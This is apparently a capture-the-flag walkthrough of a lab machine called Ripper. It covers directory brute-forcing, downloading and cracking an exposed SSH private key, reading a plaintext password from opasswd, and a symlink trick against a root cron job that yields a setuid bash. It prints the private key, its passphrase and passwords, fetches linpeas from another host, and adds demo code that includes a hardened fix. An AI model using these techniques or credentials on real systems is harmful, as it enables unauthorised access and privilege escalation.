## Information gathering

```sh
IP=192.168.0.196
nmap -p- $IP
22/tcp open ssh
80/tcp open http
```
Two ports are open. Let's look at port 80:
```sh
curl $IP -v
*   Trying 192.168.0.196:80...
* Connected to 192.168.0.196 (192.168.0.196) port 80
> GET / HTTP/1.1
> Host: 192.168.0.196
> User-Agent: curl/8.8.0
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
< Date: Fri, 18 Oct 2024 02:45:35 GMT
< Server: Apache/2.4.38 (Debian)
< Last-Modified: Wed, 26 May 2021 13:00:17 GMT
< ETag: "39-5c33b39690b03"
< Accept-Ranges: bytes
< Content-Length: 57
< Content-Type: text/html
<
Website in maintenance... Come back next month please.
* Connection
```
The site is under maintenance, come back next month? Ignore that and brute-force directories first:
```sh
gobuster dir -u http://$IP -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x php,php3,txt,html
```
The scan found nothing at all. Experience says that no results means the wordlist is too small; I was already using a large one, so let's add more extensions instead:
```sh
gobuster dir -u http://$IP -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml
```
Still nothing. I couldn't take it any more and went to look at a write-up, https://www.bilibili.com/video/BV1eS411c7jp/?vd_source=3aefc8f78d21af4b1df44ab92654ae4e. Good grief: raft-large-directories-lowercase.txt simply does not contain this keyword, whereas dirb's common.txt does. (raft-large-directories is, as the name says, a list of directory names; for a backup file like this one the raft-large-files lists are the more appropriate pick.)
```sh
gobuster dir -u http://$IP -w /usr/share/wordlists/dirb/common.txt -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml
/id_rsa.bak (Status: 200) [Size: 1876]
```
It found an id_rsa.bak. Let's look at its contents:
```sh
curl http://$IP/id_rsa.bak
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABDZVZMVwo
cfZRVpSIfcOdmiAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQDerPt4pwoQ
1Hr7OaU0qZa+npWhHQxp7c9/TTTTukuyHdFeSFlZtUKPOsw+HftTaIuctJSiy9QDovv3I0
Ga+EmEvFDRUX+VQ/tLlHXT3dwdPir6QesuXnzFL7lVB/x4XYjOp1Xi14G+1Q3EWUuePWQ2
tPr40k0k87/RmYThRITfxMVk603wP6ZvGTGN5+0iH2Rq4sfXrO+p3sdVFiH4N/E41agxyS
4maevY02gro1v0GHRDxIh2i9w6FyetXcorIUwktLT/sdbTMDtTHr6tS/wo1TF8m+KIByxD
0ASt505dZ0Ivwu3hmTyKmpZNFYEM1yOK68ukeGEu5s9Hn0/fjGP3AAAD0G71wlLfDrs2vp
im79u4YZrUQ5ruNye7XJ/J7UaS+VwuWVeMpsbY3a66minp5e4Q+HSDoBQMf6Q4d9zYSV0u
SLIAjtrZH6K990Ixx9B/J3BJHd/zez04sTg9G3kyBKdZACHdonEOE6KwXqM8bRcSK6l4ni
J4sLQYNAdN/G0j+8kpt+p6UiRTkg/HSHq/6o9Sv3aQ9XkjTVjb4iuavl4/o36bDFCmqo3u
zmzRA6TUsRtQ3HqJJjz73+nurXjFPgqwdG06S+O6W+Uf/jD23bj7bDvtOBd6NR7hvSBzbg
A/0ygikZCob1RXR83UNTSIVhSb/UttRJx+aHomYZPIQoFHm1Aa2OpOrsoQcoD87SchJQmN
Ah255/d/IL5t2d6A+ez0+P2mYKlrx5LhU+WdTBK96V0kOwMG4h7FVkQZCwC3JBuriMM/9C
hOJinGjgqlEnn+k7alY61UInMeg0B3uLr4cyLG7cJhvbcP8lQFrIp8dDonCjT6imIIh10q
6wtJAQIsyuy6LH5Rc3VKClQ/7CpQMEsotIE+LnbJHEWG/98qBzjz3Np+ptt3rLAAvwJvYA
tEV88hyGkq4WwyCoFKeuU6eOzrzH7/FRdyMq4+XKuTb53HhlNnvJm7MocBDF9yFTCna0Aw
Y21i5ozIdfvcZKyMb4qWuDGboGC7xK4MaoiD6w2JMJdyshL54GqChG+XTprAZEV8ZfsZAL
o2ssY4Jyza6u4oTbsWbkVjfo126chPs1Vm9PDQUDy0cByKgFY7vO+1lBL9Um8gb56l0Glq
C5UsxFhPE1nsdVa4YNAIu2dlnNjfO/xuo/oa07kHsr29OSD/axb4J5eOFY7en1mvpWuGhE
+FyU04ADXr4ElZ9ZUrnLBslEABIAGXhDJ3BvfY4EXcbl0uHViWT3DcLnXknljMXu4lp7y2
ZiMSYo4W8NuTdwlv61kriww5gD++qiQFt71c91yFxqJlAFOUqwpDaTf0wT26NMX2Byj0hL
RA40xQaQbna1Rp8j1Y+/PnsG+rr+tfhBXszKJo5fRe/xSqfMykTLFUgCRDub/xn3QBNw5j
SaRXpV8E18NYfp0PBz4vpjVzlH+LbN6k09xl0FhicBn8dd12fs0NTlKRvwRvVWIgB7RYJB
lZzcYbWzVy8DKI7+MOXmmWF+aaOc/RPytTDntChvmGtBqXKzrYx6HqKTvXpQ/YuuwscsKP
5fo7tGQ+DvUlyyLfk/UM4N8fsm+rsgkV84ogrTDn3CzMeBu6XY0+XWUbmhRL1/9yuWuU0D
By0QmXw3P/H1csxt8WRkuNygJz80o=
-----END OPENSSH PRIVATE KEY-----

curl http://$IP/id_rsa.bak > id_ras
ssh-keygen -y -f id_ras
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_ras' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_ras": bad permissions
┌──(root㉿kali)-[~/Downloads/Ripper]
└─# chmod 600 id_ras
┌──(root㉿kali)-[~/Downloads/Ripper]
└─# ssh-keygen -y -f id_ras
Enter passphrase:
```
## Exploitation

The key has a passphrase. Crack it:
```sh
ssh2john id_ras > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
bananas          (id_ras)
┌──(root㉿kali)-[~/Downloads/Ripper]
└─# ssh-keygen -y -f id_ras
Enter passphrase:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDerPt4pwoQ1Hr7OaU0qZa+npWhHQxp7c9/TTTTukuyHdFeSFlZtUKPOsw+HftTaIuctJSiy9QDovv3I0Ga+EmEvFDRUX+VQ/tLlHXT3dwdPir6QesuXnzFL7lVB/x4XYjOp1Xi14G+1Q3EWUuePWQ2tPr40k0k87/RmYThRITfxMVk603wP6ZvGTGN5+0iH2Rq4sfXrO+p3sdVFiH4N/E41agxyS4maevY02gro1v0GHRDxIh2i9w6FyetXcorIUwktLT/sdbTMDtTHr6tS/wo1TF8m+KIByxD0ASt505dZ0Ivwu3hmTyKmpZNFYEM1yOK68ukeGEu5s9Hn0/fjGP3 jack@splunk
```
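Before reaching for john it is worth knowing what actually protects the key, because that decides how expensive cracking will be. The following is an added example, not part of the original write-up or of any tool it uses: it decodes the first two base64 lines of the id_rsa.bak above and reports the cipher, KDF, salt and bcrypt round count, which is the same information ssh2john pulls out of the file. The `Reader` class and `parse_openssh_header` function are names chosen here; the only input is the key text already shown on this page.

```python
import base64
import struct

# Input taken from the key above: its first two base64 lines. They cover the
# whole header and the start of the embedded public key, which is all this
# parser needs; the remaining lines hold the rest of the public key and the
# encrypted private section.
KEY_HEAD = (
    "b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABDZVZMVwo"
    "cfZRVpSIfcOdmiAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQDerPt4pwoQ"
)

MAGIC = b"openssh-key-v1\x00"


class Reader:
    """Cursor over SSH wire format: big-endian uint32 and length-prefixed strings."""

    def __init__(self, data):
        self.data, self.pos = data, 0

    def u32(self):
        if self.pos + 4 > len(self.data):
            raise ValueError("truncated uint32")
        (value,) = struct.unpack(">I", self.data[self.pos:self.pos + 4])
        self.pos += 4
        return value

    def string(self):
        n = self.u32()
        if self.pos + n > len(self.data):
            raise ValueError("truncated string")
        s = self.data[self.pos:self.pos + n]
        self.pos += n
        return s


def parse_openssh_header(armored):
    """Return cipher, KDF and KDF parameters of an OpenSSH private key, plus
    the part of the (cleartext) public key that precedes the ciphertext.
    Accepts the full armored file or just its base64 body, even truncated."""
    body = "".join(line.strip() for line in armored.splitlines()
                   if not line.startswith("-----"))
    body += "=" * (-len(body) % 4)          # re-pad a truncated body
    blob = base64.b64decode(body)
    if not blob.startswith(MAGIC):
        raise ValueError("not an openssh-key-v1 file")
    r = Reader(blob)
    r.pos = len(MAGIC)
    cipher = r.string().decode()
    kdf = r.string().decode()
    kdfopts = Reader(r.string())           # empty string for an unencrypted key
    info = {"cipher": cipher, "kdf": kdf, "encrypted": cipher != "none"}
    if kdf == "bcrypt":
        info["salt"] = kdfopts.string().hex()
        info["rounds"] = kdfopts.u32()     # ssh-keygen -a value, default 16
    info["nkeys"] = r.u32()
    info["pubkey_len"] = r.u32()           # public key blob is stored in clear
    info["keytype"] = r.string().decode()  # parse the blob in place: it may be cut off
    if info["keytype"] == "ssh-rsa":
        info["e"] = int.from_bytes(r.string(), "big")   # modulus n would follow
    return info


if __name__ == "__main__":
    for key, value in parse_openssh_header(KEY_HEAD).items():
        print(f"{key:>11}: {value}")
```

`encrypted` is what the `Enter passphrase:` prompt above reflects (cipher `aes256-ctr` rather than `none`), and `rounds` is the knob that sets the cost of every guess john makes: the 16 here is ssh-keygen's default, so a rockyou run is quick, whereas a key generated with a high `-a` value would be much slower to crack.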
We have the passphrase, and the key comment `jack@splunk` tells us the username. Log in:
```sh
ssh -i id_ras jack@$IP
jack@ripper:~$ id
uid=1000(jack) gid=1000(jack) groups=1000(jack)
jack@ripper:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
jack:x:1000:1000:,,,:/home/jack:/bin/bash
helder:x:1001:1001:,,,:/home/helder:/bin/bash
```
## Privilege escalation: helder

The user flag is not in jack's home. A quick look around turned up nothing, so let's upload pspy64 and watch what runs:
```sh
2024/10/18 05:21:01 CMD: UID=0 PID=812 | /bin/sh -c nc -vv -q 1 localhost 10000 > /root/.local/out && if [ "$(cat /root/.local/helder.txt)" = "$(cat /home/helder/passwd.txt)" ]; then chmod +s "/usr/bin/$(cat /root/.local/out)"; fi
```
I have no permission to read /home/helder/passwd.txt, and this job runs as UID 0, so I am clearly still missing a step: getting helder's privileges. Since pspy64 showed no way there, let's also run linpeas.sh:
```sh
wget 192.168.0.30:8000/linpeas.sh
sh linpeas.sh | tee out
╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root 3129 Feb 10  2019 usr.bin.man
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. jack:Il0V3lipt0n1c3t3a
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
```
There is a password in opasswd. But we already have jack's SSH access, don't we? Could this be helder's password instead? Try it:
```sh
jack@ripper:~$ su helder
Password:
helder@ripper:/home/jack$
```
Indeed it is. The user flag is in helder's home too.
## Privilege escalation: root

Let's first go through the command we saw earlier:
```sh
/bin/sh -c nc -vv -q 1 localhost 10000 > /root/.local/out && if [ "$(cat /root/.local/helder.txt)" = "$(cat /home/helder/passwd.txt)" ]; then chmod +s "/usr/bin/$(cat /root/.local/out)"; fi
```
What it does: nc connects to local port 10000 and whatever it receives is written to /root/.local/out. If nc exited cleanly, the contents of /root/.local/helder.txt and /home/helder/passwd.txt are compared, and if they are identical, the file /usr/bin/$(cat /root/.local/out) gets the setuid bit. Everything runs as root.
So if the answer on port 10000 is `bash`, root will make /usr/bin/bash setuid and we get a root shell. But how do we make `cat /root/.local/helder.txt` and `cat /home/helder/passwd.txt` produce the same output, when we have no permission to read /root/.local/helder.txt at all?

Because the comparison is done with `cat`, which follows symbolic links, and it runs as root: point /home/helder/passwd.txt at /root/.local/helder.txt and root ends up comparing the file with itself, which is always equal. Start a listener that answers `bash`, then plant the link:

```sh
nc -lp 10000
bash
ln -s /root/.local/helder.txt /home/helder/passwd.txt
```

Two practical details: `ln -s` refuses to overwrite an existing passwd.txt, so remove it first or use `ln -sf`; and `-q 1` makes root's nc quit one second after EOF on its stdin, which under a scheduled job happens immediately, so the reply must be ready the moment it connects (`echo bash | nc -lp 10000` does that without relying on typing fast).
After the next run of the job:
```sh
helder@ripper:~$ ls -al /usr/bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /usr/bin/bash
helder@ripper:~$ /usr/bin/bash -p
helder@ripper:~$ id
uid=1001(helder) gid=1001(helder) euid=0(root) egid=0(root) groups=0(root),1001(helder)
```
Root obtained. 🎉 Oh, and I had a look at passwd.txt afterwards: the password inside it is the same Il0V3lipt0n1c3t3a as before.
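To make the check-then-use problem in that job concrete, here is an added example that is neither the machine's cron script nor code from the original write-up. It re-creates the job's comparison in a temporary directory, shows the symlink making it pass and the setuid bit landing on the chosen file, and puts beside it a hardened reader that opens the user-controlled path with `O_NOFOLLOW`. The file names `secret`, `passwd.txt`, `out` and `bin/bash` and all function names are stand-ins chosen here for /root/.local/helder.txt, /home/helder/passwd.txt, /root/.local/out and /usr/bin/bash; it runs as an ordinary user because you may set the setuid bit on a file you own.

```python
import os
import shutil
import stat
import tempfile


def vuln_check(secret, userfile):
    """The job's test, [ "$(cat a)" = "$(cat b)" ], as a function. open()
    follows symlinks, so whoever controls userfile decides which file the
    privileged reader compares against the secret."""
    with open(secret, "rb") as a, open(userfile, "rb") as b:
        return a.read() == b.read()


def safe_check(secret, userfile, expected_uid):
    """Hardened reader: O_NOFOLLOW makes open() itself fail on a symlink
    (ELOOP), so there is no window between a check and the read; the open
    descriptor is then verified to be a regular file owned by expected_uid."""
    try:
        fd = os.open(userfile, os.O_RDONLY | os.O_NOFOLLOW)
    except OSError:
        return False
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode) or st.st_uid != expected_uid:
            return False
        data = b""
        while chunk := os.read(fd, 4096):
            data += chunk
    finally:
        os.close(fd)
    with open(secret, "rb") as a:
        return a.read() == data


def fake_root_job(secret, userfile, out, bindir):
    """The rest of the one-liner. The name to chmod comes from `out`, i.e.
    from whatever answered on local port 10000; $(cat out) strips the
    trailing newline, so "bash\\n" selects bindir/bash. Returns the path
    it made setuid, or None when the comparison failed."""
    if not vuln_check(secret, userfile):
        return None
    with open(out) as f:
        target = os.path.join(bindir, f.read().rstrip("\n"))
    os.chmod(target, os.stat(target).st_mode | stat.S_ISUID | stat.S_ISGID)
    return target


def is_setuid(path):
    return bool(os.stat(path).st_mode & stat.S_ISUID)


def setup_scenario():
    """Constructed files: secret holds the password from the write-up,
    passwd.txt deliberately differs, legit is what an honest passwd.txt
    would look like, out holds the listener's answer, bin/bash is empty."""
    d = tempfile.mkdtemp()
    for name, content in (("secret", "Il0V3lipt0n1c3t3a\n"),
                          ("legit", "Il0V3lipt0n1c3t3a\n"),
                          ("passwd.txt", "not-the-password\n"),
                          ("out", "bash\n")):
        with open(os.path.join(d, name), "w") as f:
            f.write(content)
    os.mkdir(os.path.join(d, "bin"))
    fake_bash = os.path.join(d, "bin", "bash")
    open(fake_bash, "w").close()
    os.chmod(fake_bash, 0o755)
    return d


def plant_symlink(d):
    """helder's move: replace passwd.txt with a link to the unreadable
    secret. ln -s refuses to overwrite an existing file, so it is removed
    first (the shell equivalent is ln -sf)."""
    link = os.path.join(d, "passwd.txt")
    os.unlink(link)
    os.symlink(os.path.join(d, "secret"), link)


def demo():
    d = setup_scenario()
    p = lambda name: os.path.join(d, name)
    try:
        before = vuln_check(p("secret"), p("passwd.txt"))     # contents differ
        plant_symlink(d)
        target = fake_root_job(p("secret"), p("passwd.txt"), p("out"), p("bin"))
        return {
            "before": before,
            "after": vuln_check(p("secret"), p("passwd.txt")),  # secret vs itself
            "setuid": target is not None and is_setuid(target),
            "safe_on_link": safe_check(p("secret"), p("passwd.txt"), os.getuid()),
            "safe_on_real": safe_check(p("secret"), p("legit"), os.getuid()),
        }
    finally:
        shutil.rmtree(d)


if __name__ == "__main__":
    print(demo())
```

One detail the demo also makes visible: `chmod +s` changes only mode bits, never ownership, so the trick only pays off when the chosen target is already owned by root. Sending the name of a file you own would produce a setuid-helder binary, which gains nothing; that is why `bash` is the answer to give on port 10000.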
## Summary

A few things I did not know before and learned this time:

- The opasswd file lives at /etc/security/opasswd. It stores users' previous passwords (normally as hashes) so that when a user changes their password the system can reject one that was used recently. The intent is security, but anyone who can read the file gets password material, and on this box it held a usable password in the clear.
- `ln -s`: a symbolic link lets you redirect a privileged process's file access. The process follows the link and reads a file you could not read yourself, which is how the root job ended up comparing its own secret with itself.
- When enumeration turns up nothing: switch to a bigger wordlist, add extensions, and try other wordlists.

Also, every time I went to submit a flag on HMV my session had expired, probably because I'm too slow and don't finish before it runs out. So I just wrote a Tampermonkey script that reloads the page automatically:
```js
(function () {
    "use strict";
    // reload every 5 minutes so the HMV session does not expire
    setInterval(() => location.reload(), 1000 * 60 * 5);
})();
```
And if you want to sync multiple Tampermonkey scripts, you need to enable it as described here: https://www.tampermonkey.net/faq.php#Q105